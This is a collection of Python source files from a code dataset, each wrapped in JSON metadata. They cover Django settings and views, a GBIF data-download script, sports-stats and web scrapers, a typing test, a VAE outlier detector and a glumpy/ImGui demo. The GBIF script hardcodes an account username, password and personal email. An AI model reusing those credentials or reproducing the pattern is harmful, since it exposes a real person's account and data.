'example.demo')\nMIDDLEWARE_CLASSES = ('django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware')\nROOT_URLCONF = 'example.urls'\nWSGI_APPLICATION = 'example.wsgi.application'\nDATABASES = {'default': {'ENGINE': 'django.db.backends.sqlite3', \n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3')}}\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSTATIC_URL = '/static/'\ntry:\n import suit\n from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP\n INSTALLED_APPS = ('suit', ) + INSTALLED_APPS\n TEMPLATE_CONTEXT_PROCESSORS = TCP + ('django.core.context_processors.request', )\nexcept ImportError:\n pass\n\nCUSTOM_CONTENT_TYPES = ('example', 'user')", "sub_path": "pycfiles/django-custard-0.10.tar/settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 1999, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.conf.global_settings.TEMPLATE_CONTEXT_PROCESSORS", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "574743283", "text": "import requests\n# Файл аналогичен прокомментированному файлу \"gbif_downl_api_genus_striga.py\". Файл, сформированный в ответ на запрос, не скачивается по ссылке.\nreq_data = {\n \"creator\": \"pavel_polonchuk\",\n \"notificationAddresses\": [\n \"Chelonpepk@gmail.com\"\n ],\n \"sendNotification\": 'true',\n \"format\": \"SIMPLE_CSV\",\n \"predicate\": {\n \"type\": \"and\",\n \"predicates\": [\n {\n \"type\": \"equals\",\n \"key\": \"TAXON_KEY\",\n \"value\": \"2927479\"\n },\n {\n \"type\": \"equals\",\n \"key\": \"YEAR\",\n \"value\": \"2020\"\n },\n {\n \"type\": \"in\",\n \"key\": \"COUNTRY\",\n \"values\": [\n \"RU\"\n ]\n }\n ]\n }\n}\n\nres = requests.post('https://api.gbif.org/v1/occurrence/download/request', json=req_data, auth=('pavel_polonchuk', 'Feature_1'))\ninstance_code = res.content\n\nprint(instance_code)\n\nrequest_instance_code = instance_code.decode()\n\nprint(request_instance_code)\n\ndownload_base_url = 'https://api.gbif.org/v1/occurrence/download/request/'\n\nreq = requests.get(f'{download_base_url}{request_instance_code}.zip', allow_redirects=True)\n\nprint(f'{download_base_url}{request_instance_code}.zip')\n\nprint(req)\n\nwith open('download_res_cuscuta.zip', 'wb') as a_file:\n a_file.write(req.content)\n", "sub_path": "gbif_downl_api_genus_cuscuta.py", "file_name": "gbif_downl_api_genus_cuscuta.py", "file_ext": "py", "file_size_in_byte": 1363, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "394755752", "text": "from django.shortcuts import render, redirect, reverse\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth import login, authenticate\nfrom django.views import generic\nfrom attendance.models import Event\nfrom .forms import SignUpForm, EventForm, AttendForm\nfrom datetime import datetime\n\n\ntoday = datetime.today()\nnow = datetime.now()\n\n\n# Create your views here.\ndef index(request):\n num_future_events = Event.objects.filter(date__gte=today).filter(approved=True).count()\n query_set = Event.objects.filter(date__gte=today).filter(approved=True).order_by('date', 'time')[:3]\n\n context = {\n 'num_future_events': num_future_events,\n 'query_set': query_set\n }\n\n return render(request, 'index.html', context=context)\n\n\nclass EventListView(generic.ListView):\n model = Event\n query_set = Event.objects.filter(date__gte=today).exclude(approved=False).order_by('date', 'time')[:21]\n template_name = 'listPage.html'\n\n def get_queryset(self):\n return self.query_set.all() # all forces the query set to update\n\n\nclass EventDetailView(generic.DetailView):\n model = Event\n template_name = 'eventDetail.html'\n\n\ndef RegisterUser(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('index')\n else:\n form = SignUpForm()\n\n return render(request, 'register.html', {'form': form})\n\n\ndef CreateEvent(request):\n event_form = EventForm(data=request.POST)\n if event_form.is_valid():\n event = event_form.save()\n if request.user.is_superuser:\n event.approved = True\n event.save()\n return redirect('event_detail', pk=event.pk)\n else:\n event_form = EventForm()\n return render(request, \"eventForm.html\", {'form': event_form})\n\n\ndef attend(request, pk):\n alumni_form = AttendForm(data=request.POST)\n if alumni_form.is_valid():\n event = Event.objects.get(pk=pk)\n event.numAttend += 1\n alumni = alumni_form.save(commit=False)\n alumni.attended = event\n event.save()\n alumni.save()\n return redirect('event_detail', pk)\n else:\n alumni_form = AttendForm()\n return render(request, \"attendForm.html\", {'form': alumni_form})\n\n\ndef reports(request):\n event_list = Event.objects.all()\n event_list = event_list.filter(approved=True, date__lte=today)\n event_list = event_list.order_by('-date', 'time')\n paginator = Paginator(event_list, 10) # Show 10 contacts per page\n\n page = request.GET.get('page')\n events = paginator.get_page(page)\n return render(request, 'reportPage.html', {'events': events})\n\n\ndef attendanceList(request, pk):\n event = Event.objects.get(pk=pk)\n alumni = event.alumni_set.all()\n return render(request, 'attendList.html', {'alumni': alumni})\n", "sub_path": "attendance/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.today", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "name"}, {"api_name": "attendance.models.Event.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 16, "usage_type": "name"}, {"api_name": "attendance.models.Event.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 27, "usage_type": "name"}, {"api_name": "attendance.models.Event", "line_number": 28, "usage_type": "name"}, {"api_name": "attendance.models.Event.objects.filter", "line_number": 29, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 29, "usage_type": "name"}, {"api_name": "django.views.generic.DetailView", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 36, "usage_type": "name"}, {"api_name": "attendance.models.Event", "line_number": 37, "usage_type": "name"}, {"api_name": "forms.SignUpForm", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 49, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 50, "usage_type": "call"}, {"api_name": "forms.SignUpForm", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}, {"api_name": "forms.EventForm", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 64, "usage_type": "call"}, {"api_name": "forms.EventForm", "line_number": 66, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "forms.AttendForm", "line_number": 71, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 73, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 79, "usage_type": "call"}, {"api_name": "forms.AttendForm", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects.all", "line_number": 86, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 86, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 93, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects.get", "line_number": 97, "usage_type": "call"}, {"api_name": "attendance.models.Event.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "attendance.models.Event", "line_number": 97, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "645967113", "text": "import json\n\nfrom nba_api.stats.endpoints import leagueleaders\n\n\ncustom_headers = {\n \"Host\": \"stats.nba.com\",\n \"Connection\": \"keep-alive\",\n \"Cache-Control\": \"max-age=0\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.9\",\n}\n\n\ndef by_year(year, stat):\n \"\"\" \"\"\"\n obj = leagueleaders.LeagueLeaders(\n league_id=\"00\",\n per_mode48=\"Totals\",\n scope=\"S\",\n season=year,\n season_type_all_star=\"Regular Season\",\n stat_category_abbreviation=stat,\n headers=custom_headers,\n )\n return obj.get_dict()[\"resultSet\"][\"rowSet\"]\n\n\nYEARS = [\n \"2014-15\",\n \"2015-16\",\n \"2016-17\",\n \"2017-18\",\n \"2018-19\",\n \"2019-20\",\n \"2020-21\",\n]\n\nCATS = [\n \"MIN\",\n \"PTS\",\n \"REB\",\n \"STL\",\n \"BLK\",\n \"EFF\",\n \"AST\",\n \"FTA\",\n]\n\nif __name__ == \"__main__\":\n with open(\"teams.json\") as f:\n data = json.load(f)\n\n history = {}\n for year in YEARS:\n history[year] = {}\n for cat in CATS:\n history[year][cat] = by_year(year, cat)\n\n totals = {}\n for year, awards in data.items():\n for award in awards:\n print(year, award)\n if award not in totals:\n totals[award] = []\n\n scraped = []\n for player in awards[award]:\n for cat in CATS:\n for rank, row in enumerate(history[year][cat]):\n if row[2] == player:\n scraped.append([cat, rank + 1, player, year])\n totals[award].extend(scraped)\n\n with open(\"ranks.json\", \"w+\") as f:\n json.dump(totals, f, indent=4)\n", "sub_path": "db/leaders.py", "file_name": "leaders.py", "file_ext": "py", "file_size_in_byte": 1977, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "nba_api.stats.endpoints.leagueleaders.LeagueLeaders", "line_number": 20, "usage_type": "call"}, {"api_name": "nba_api.stats.endpoints.leagueleaders", "line_number": 20, "usage_type": "name"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "170885691", "text": "import time\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport numpy as np\n# make sure to import all of these libraries to make the code work\n\ndef wpm(words, seconds):\n mins,secs = divmod(seconds, 60)\n tmin = mins + (secs/60)\n return int(words/tmin)\n\ndef inac(correct, total):\n percent = (correct/total)\n return round(percent*100)\n\ndef gen_words():\n web = requests.get(\"http://www.mieliestronk.com/corncob_lowercase.txt\")\n soup = BeautifulSoup(web.text, 'html.parser')\n english_words = list(soup)[0].strip(\"\\r\").split()\n select = random.choice(english_words)\n return select\n\ndef plot(file_name):\n file = open(file_name, \"r\")\n text = file.read()\n stats = text.split(\"\\n\")\n del stats[len(stats) - 1]\n new_stats = []\n for score in stats:\n stat = score.split()\n new_stats.append(stat)\n new_stats = np.array(new_stats)\n new_stats = new_stats.T\n new_stats = list(new_stats)\n wpm, ac = new_stats\n wpm = [int(x) for x in wpm]\n ac = [\"Test #\" + str(pos + 1) + \": \" + num + \"%\" for pos, num in enumerate(ac)]\n ypos = np.arange(len(ac))\n plt.xticks(ypos, ac)\n plt.bar(ypos, wpm)\n plt.show()\n\ndef main(length):\n name = input(\"What is your name?\\n\")\n file_name = name + \".txt\"\n file = open(file_name, \"ab\")\n total = 0\n count = 0\n start = time.time()\n end = time.time()\n inp = None\n word = None\n while int(end - start) <= length:\n word = gen_words()\n inp = input(word + \"\\n\")\n if str(inp) == word:\n count += 1\n total += 1\n end = time.time()\n if str(inp) == word:\n count -= 1\n file.write(bytes(str(wpm(count, length - total*1.75)) + \" \" + str(inac(count, total - 1)) + \"\\n\", \"UTF-8\"))\n file.close()\n plot(file_name)\n\nmain(60) # you can choose how many seconds you want, default is 60\n", "sub_path": "typing-test.py", "file_name": "typing-test.py", "file_ext": "py", "file_size_in_byte": 1904, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 20, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "time.time", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "32434402", "text": "import numpy as np\nimport pickle\nimport random\n\nfrom model import model\nfrom utils import flatten, performance, outlier_stats\n\n\nclass OutlierVAE(object):\n \"\"\" Outlier detection using variational autoencoders (VAE).\n \n Arguments:\n - threshold: (float): reconstruction error (mse) threshold used to classify outliers\n - reservoir_size (int): number of observations kept in memory using reservoir sampling used for mean and stdev\n \n Functions:\n - reservoir_sampling: applies reservoir sampling to incoming data\n - predict: detect and return outliers\n - send_feedback: add target labels as part of the feedback loop\n - metrics: return custom metrics\n \"\"\"\n def __init__(self,threshold=10,reservoir_size=50000,model_name='vae',load_path='./models/'):\n \n self.threshold = threshold\n self.reservoir_size = reservoir_size\n self.batch = []\n self.N = 0 # total sample count up until now for reservoir sampling\n \n # load model architecture parameters\n with open(load_path + model_name + '.pickle', 'rb') as f:\n n_features, hidden_layers, latent_dim, hidden_dim, output_activation = pickle.load(f)\n \n # instantiate model\n self.vae = model(n_features,hidden_layers=hidden_layers,latent_dim=latent_dim,\n hidden_dim=hidden_dim,output_activation=output_activation)\n self.vae.load_weights(load_path + model_name + '_weights.h5') # load pretrained model weights\n self.vae._make_predict_function()\n \n # load data preprocessing info\n with open(load_path + 'preprocess_' + model_name + '.pickle', 'rb') as f:\n preprocess = pickle.load(f)\n self.preprocess, self.clip, self.axis = preprocess[:3]\n if self.preprocess=='minmax':\n self.xmin, self.xmax = preprocess[3:5]\n self.min, self.max = preprocess[5:]\n elif self.preprocess=='standardized':\n self.mu, self.sigma = preprocess[3:]\n \n self._predictions = []\n self._labels = []\n self._mse = []\n self.roll_window = 100\n self.metric = [float('nan') for i in range(18)]\n \n \n def reservoir_sampling(self,X,update_stand=False):\n \"\"\" Keep batch of data in memory using reservoir sampling. \"\"\"\n for item in X:\n self.N+=1\n if len(self.batch) < self.reservoir_size:\n self.batch.append(item)\n else:\n s = int(random.random() * self.N)\n if s < self.reservoir_size:\n self.batch[s] = item\n \n if update_stand:\n if self.preprocess=='minmax':\n self.xmin = np.array(self.batch).min(axis=self.axis)\n self.xmax = np.array(self.batch).max(axis=self.axis)\n elif self.preprocess=='standardized':\n self.mu = np.array(self.batch).mean(axis=self.axis)\n self.sigma = np.array(self.batch).std(axis=self.axis)\n return\n\n \n def predict(self,X,feature_names):\n \"\"\" Detect outliers from mse using the threshold. \n \n Arguments:\n - X: input data\n - feature_names\n \"\"\"\n \n # clip data per feature\n X = np.clip(X,[-c for c in self.clip],self.clip)\n \n if self.N < self.reservoir_size:\n update_stand = False\n else:\n update_stand = True\n \n self.reservoir_sampling(X,update_stand=update_stand)\n \n # apply scaling\n if self.preprocess=='minmax':\n X_scaled = ((X - self.xmin) / (self.xmax - self.xmin)) * (self.max - self.min) + self.min\n elif self.preprocess=='standardized':\n X_scaled = (X - self.mu) / (self.sigma + 1e-10)\n \n # sample latent variables and calculate reconstruction errors\n N = 10\n mse = np.zeros([X.shape[0],N])\n for i in range(N):\n preds = self.vae.predict(X_scaled)\n mse[:,i] = np.mean(np.power(X_scaled - preds, 2), axis=1)\n self.mse = np.mean(mse, axis=1)\n self._mse.append(self.mse)\n self._mse = flatten(self._mse)\n \n # make prediction\n self.prediction = np.array([1 if e > self.threshold else 0 for e in self.mse]).astype(int)\n self._predictions.append(self.prediction)\n self._predictions = flatten(self._predictions)\n \n return self.prediction\n \n \n def send_feedback(self,X,feature_names,reward,truth):\n \"\"\" Return outlier labels as part of the feedback loop.\n \n Arguments:\n - X: input data\n - feature_names\n - reward\n - truth: outlier labels\n \"\"\"\n self.label = truth\n self._labels.append(self.label)\n self._labels = flatten(self._labels)\n \n scores = performance(self._labels,self._predictions,roll_window=self.roll_window)\n stats = outlier_stats(self._labels,self._predictions,roll_window=self.roll_window)\n \n convert = flatten([scores,stats])\n metric = []\n for c in convert: # convert from np to native python type to jsonify\n metric.append(np.asscalar(np.asarray(c)))\n self.metric = metric\n \n return\n\n \n def metrics(self):\n \"\"\" Return custom metrics.\n Printed with a delay of 1 prediction because the labels are returned in the feedback step. \n \"\"\"\n \n if self.mse.shape[0]>1:\n raise ValueError('Metrics can only handle single observations.')\n \n if self.N==1:\n pred = float('nan')\n err = float('nan')\n y_true = float('nan')\n else:\n pred = int(self._predictions[-2])\n err = self._mse[-2]\n y_true = int(self.label[0])\n \n is_outlier = {\"type\":\"GAUGE\",\"key\":\"is_outlier\",\"value\":pred}\n mse = {\"type\":\"GAUGE\",\"key\":\"mse\",\"value\":err}\n obs = {\"type\":\"GAUGE\",\"key\":\"observation\",\"value\":self.N - 1}\n threshold = {\"type\":\"GAUGE\",\"key\":\"threshold\",\"value\":self.threshold}\n \n label = {\"type\":\"GAUGE\",\"key\":\"label\",\"value\":y_true}\n \n accuracy_tot = {\"type\":\"GAUGE\",\"key\":\"accuracy_tot\",\"value\":self.metric[4]}\n precision_tot = {\"type\":\"GAUGE\",\"key\":\"precision_tot\",\"value\":self.metric[5]}\n recall_tot = {\"type\":\"GAUGE\",\"key\":\"recall_tot\",\"value\":self.metric[6]}\n f1_score_tot = {\"type\":\"GAUGE\",\"key\":\"f1_tot\",\"value\":self.metric[7]}\n f2_score_tot = {\"type\":\"GAUGE\",\"key\":\"f2_tot\",\"value\":self.metric[8]}\n \n accuracy_roll = {\"type\":\"GAUGE\",\"key\":\"accuracy_roll\",\"value\":self.metric[9]}\n precision_roll = {\"type\":\"GAUGE\",\"key\":\"precision_roll\",\"value\":self.metric[10]}\n recall_roll = {\"type\":\"GAUGE\",\"key\":\"recall_roll\",\"value\":self.metric[11]}\n f1_score_roll = {\"type\":\"GAUGE\",\"key\":\"f1_roll\",\"value\":self.metric[12]}\n f2_score_roll = {\"type\":\"GAUGE\",\"key\":\"f2_roll\",\"value\":self.metric[13]}\n \n true_negative = {\"type\":\"GAUGE\",\"key\":\"true_negative\",\"value\":self.metric[0]}\n false_positive = {\"type\":\"GAUGE\",\"key\":\"false_positive\",\"value\":self.metric[1]}\n false_negative = {\"type\":\"GAUGE\",\"key\":\"false_negative\",\"value\":self.metric[2]}\n true_positive = {\"type\":\"GAUGE\",\"key\":\"true_positive\",\"value\":self.metric[3]}\n \n nb_outliers_roll = {\"type\":\"GAUGE\",\"key\":\"nb_outliers_roll\",\"value\":self.metric[14]}\n nb_labels_roll = {\"type\":\"GAUGE\",\"key\":\"nb_labels_roll\",\"value\":self.metric[15]}\n nb_outliers_tot = {\"type\":\"GAUGE\",\"key\":\"nb_outliers_tot\",\"value\":self.metric[16]}\n nb_labels_tot = {\"type\":\"GAUGE\",\"key\":\"nb_labels_tot\",\"value\":self.metric[17]}\n \n return [is_outlier,mse,obs,threshold,label,\n accuracy_tot,precision_tot,recall_tot,f1_score_tot,f2_score_tot,\n accuracy_roll,precision_roll,recall_roll,f1_score_roll,f2_score_roll,\n true_negative,false_positive,false_negative,true_positive,\n nb_outliers_roll,nb_labels_roll,nb_outliers_tot,nb_labels_tot]", "sub_path": "components/outlier-detection/vae/OutlierVAE.py", "file_name": "OutlierVAE.py", "file_ext": "py", "file_size_in_byte": 8229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pickle.load", "line_number": 31, "usage_type": "call"}, {"api_name": "model.model", "line_number": 34, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 41, "usage_type": "call"}, {"api_name": "random.random", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.flatten", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.flatten", "line_number": 114, "usage_type": "call"}, {"api_name": "utils.flatten", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.performance", "line_number": 132, "usage_type": "call"}, {"api_name": "utils.outlier_stats", "line_number": 133, "usage_type": "call"}, {"api_name": "utils.flatten", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.asscalar", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "152678317", "text": "import urllib.request\nfrom bs4 import BeautifulSoup\nfrom docx import Document\nimport re\n\nquote_page='http://ielts.zhan.com/kouyu44552.html'\n\npage=urllib.request.urlopen(quote_page)\n\nsoup=BeautifulSoup(page,'html.parser')\n\nfile_count=1\n\nfor ultag in soup.find_all('td'):\n Tag_a=ultag.find('a')\n if Tag_a is not None:\n child_link=Tag_a['href']\n doc_name_tmp1=Tag_a.text\n doc_name_tmp2=re.sub(r'[0-9]','',doc_name_tmp1)\n doc_name_tmp2=re.sub(r'[0-9][0-9]','',doc_name_tmp2)\n doc_name_tmp2 = re.sub(r'\\r\\n','',doc_name_tmp2)\n\n doc_name_tmp2=doc_name_tmp2.replace('.','')\n doc_name_tmp2 = doc_name_tmp2.replace('|', '_')\n doc_name_tmp2 = doc_name_tmp2.replace('?', '')\n # print(child_link)\n # print(doc_name_tmp1)\n # print(doc_name_tmp2)\n # print(\"\\n\")\n\n file_count_str=str(file_count)\n file_count_format=file_count_str.zfill(2)\n file_docx=Document()\n name_doc=file_count_format+'_'+doc_name_tmp2+'.docx'\n print(\"Output word file is:\")\n print(name_doc)\n print(\"\\n\")\n\n child_page=urllib.request.urlopen(child_link)\n child_soup=BeautifulSoup(child_page,'html.parser')\n # print(child_link)\n for child_ultag in child_soup.find_all('div',{'class': 'article-content'}):\n for para in child_ultag.find_all('p'):\n # print(para.text)\n file_docx.add_paragraph(para.text)\n\n file_docx.save(name_doc)\n file_count = file_count + 1", "sub_path": "IELTs_materials/IELTs_speaking.py", "file_name": "IELTs_speaking.py", "file_ext": "py", "file_size_in_byte": 1532, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 8, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 8, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 8, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 10, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 19, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "docx.Document", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 39, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 39, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 39, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "286858277", "text": "# -----------------------------------------------------------------------------\n# Copyright (c) 2009-2016 Nicolas P. Rougier. All rights reserved.\n# Distributed under the (new) BSD License.\n# -----------------------------------------------------------------------------\nfrom glumpy import app, gl, gloo\nfrom glumpy.geometry import colorcube\nfrom glumpy.transforms import TrackballPan, Position\n\nimport imgui\nfrom imgui.integrations.glfw import GlfwRenderer\n\n\nvertex = \"\"\"\n\nuniform vec4 u_color;\nattribute vec3 position;\nattribute vec4 color;\nvarying vec4 v_color;\n\nvoid main()\n{\n v_color = u_color * color;\n gl_Position = ;\n}\n\"\"\"\n\nfragment = \"\"\"\nvarying vec4 v_color;\n\nvoid main()\n{\n gl_FragColor = v_color;\n}\n\"\"\"\n\n\napp.use(\"glfw\") # Required for ImGui integration\nwindow = app.Window(width=1024, height=1024,\n color=(0.30, 0.30, 0.35, 1.00))\n\n# Build cube data\nV, I, O = colorcube()\nvertices = V.view(gloo.VertexBuffer)\nfaces = I.view(gloo.IndexBuffer)\noutline = O.view(gloo.IndexBuffer)\n\ncube = gloo.Program(vertex, fragment)\ncube.bind(vertices)\n\n# create an instance of the TrackballPan object.\ntrackball = TrackballPan(Position(\"position\"), znear=3, zfar=10, distance=5)\ncube['transform'] = trackball\n\ntrackball.aspect = 1\n# rotation around the X axis\ntrackball.phi = 0\n# rotation around the Y axis\ntrackball.theta = 0\ntrackball.zoom = 50\n\n\n@window.event\ndef on_draw(dt):\n # GUI\n imguiRenderer.process_inputs()\n imgui.new_frame()\n\n if imgui.begin_main_menu_bar():\n if imgui.begin_menu(\"File\", True):\n clicked, selected = imgui.menu_item(\"Quit\", 'ESC', False, True)\n if clicked:\n exit(0)\n imgui.end_menu()\n\n imgui.end_main_menu_bar()\n\n imgui.begin('Cube')\n changed, zoom = imgui.slider_float('zoom', trackball.zoom, 15, 90)\n if changed: trackball.zoom = zoom\n imgui.end()\n\n imgui.end_frame()\n imgui.render()\n\n\n window.clear()\n\n # Filled cube\n gl.glDisable(gl.GL_BLEND)\n gl.glEnable(gl.GL_DEPTH_TEST)\n gl.glEnable(gl.GL_POLYGON_OFFSET_FILL)\n cube['u_color'] = 1, 1, 1, 1\n cube.draw(gl.GL_TRIANGLES, faces)\n\n # Outlined cube\n gl.glDisable(gl.GL_POLYGON_OFFSET_FILL)\n gl.glEnable(gl.GL_BLEND)\n gl.glDepthMask(gl.GL_FALSE)\n cube['u_color'] = 0, 0, 0, 1\n cube.draw(gl.GL_LINES, outline)\n gl.glDepthMask(gl.GL_TRUE)\n\n imguiRenderer.render(imgui.get_draw_data())\n\n\nwindow.attach(cube['transform'])\n\n\n# ImGui\nimgui.create_context()\nimguiRenderer = GlfwRenderer(window._native_window, attach_callbacks=False) # here lives the devil\n\n\n# OpenGL\ngl.glEnable(gl.GL_DEPTH_TEST)\ngl.glPolygonOffset(1, 1)\ngl.glEnable(gl.GL_LINE_SMOOTH)\ngl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n\n\n# Run\napp.run()\n\n\n\n\n\n\n# Finish ImGui\n#imguiRenderer.shutdown()\n", "sub_path": "examples/imgui-raw-integration.py", "file_name": "imgui-raw-integration.py", "file_ext": "py", "file_size_in_byte": 2828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "glumpy.app.use", "line_number": 37, "usage_type": "call"}, {"api_name": "glumpy.app", "line_number": 37, "usage_type": "name"}, {"api_name": "glumpy.app.Window", "line_number": 38, "usage_type": "call"}, {"api_name": "glumpy.app", 